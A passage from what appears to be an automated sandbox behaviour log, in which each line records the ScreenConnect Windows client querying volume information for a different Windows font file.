                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
